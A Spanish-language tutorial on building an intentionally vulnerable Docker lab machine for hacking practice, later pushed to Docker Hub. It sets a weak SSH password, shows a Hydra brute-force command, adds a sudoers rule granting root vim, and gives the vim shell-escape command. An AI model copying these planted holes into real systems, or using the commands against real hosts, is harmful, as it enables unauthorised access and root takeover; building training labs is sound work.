apt install openssh-server
apt install nano
adduser mario
Al añadir este usuario, le ponemos la contraseña chocolate:
mario:chocolate
{{pasted_image_20240320103804.png|}}
Ahora que ya tenemos el protocolo SSH habilitado, vamos a configurar apache:
apt install apache2
Y ahora tenemos el directorio /var/www/html creado:
{{pasted_image_20240320104112.png|}}
Vamos a crear un archivo llamado secret.php donde se le de al usuario la pista de la existencia del usuario mario para hacerle fuerza bruta por SSH:
apt install php
{{pasted_image_20240320104318.png|}}
El archivo de php tendrá el siguiente contenido:
¡Secreto!
Hola Mario,
Esta web no se puede hackear.
Y así es como se ve desde el navegador:
{{pasted_image_20240320104415.png|}}
Ahora ya tendremos abiertos tanto el puerto 80 como 22 del contenedor:
{{pasted_image_20240320105636.png|}}
Ahora si usamos Hydra, podremos entrar por fuerza bruta:
hydra -l mario -P rockyou.txt ssh://172.17.0.1
{{pasted_image_20240320105803.png|}}
Ahora vamos a configurar la escalada de privilegios, donde primero debemos de instalar el binario de vim y después modificar el archivo visudo permitiendo ejecutar como root este binario:
apt install vim
apt install sudo
Y ahora ya podremos abrir el archivo sudoers ejecutando el comando sudo visudo, donde al final del todo añadiremos la siguiente línea:
mario ALL=(ALL) /usr/bin/vim
{{pasted_image_20240320110106.png|}}
De esta forma, si ahora hacemos un su mario y ejecutamos el comando sudo -l, vemos que como root este usuario puede ejecutar el siguiente binario:
{{pasted_image_20240320110144.png|}}
Donde deberá de insertar el siguiente comando para escalar privilegios:
sudo -u root /usr/bin/vim -c ':!/bin/sh'
{{pasted_image_20240320110252.png|}}
Esta máquina ya está lista, por lo que vamos a convertirla en una imagen y subirla a dockerhub:
docker commit 4ae4083f941a laboratorio1
Ya la tenemos en imagen:
{{pasted_image_20240320110447.png|}}
Ahora la subimos a dockerhub:
docker login
Iniciamos sesión:
{{pasted_image_20240320110540.png|}}
Y etiquetamos nuestra imagen:
docker tag laboratorio1:latest maalfer/laboratorio1:latest
docker push maalfer/laboratorio1:latest
Y ya se sube nuestra imagen:
{{pasted_image_20240320110957.png|}}
Lo comprobamos desde dockerhub:
{{pasted_image_20240320111015.png|}}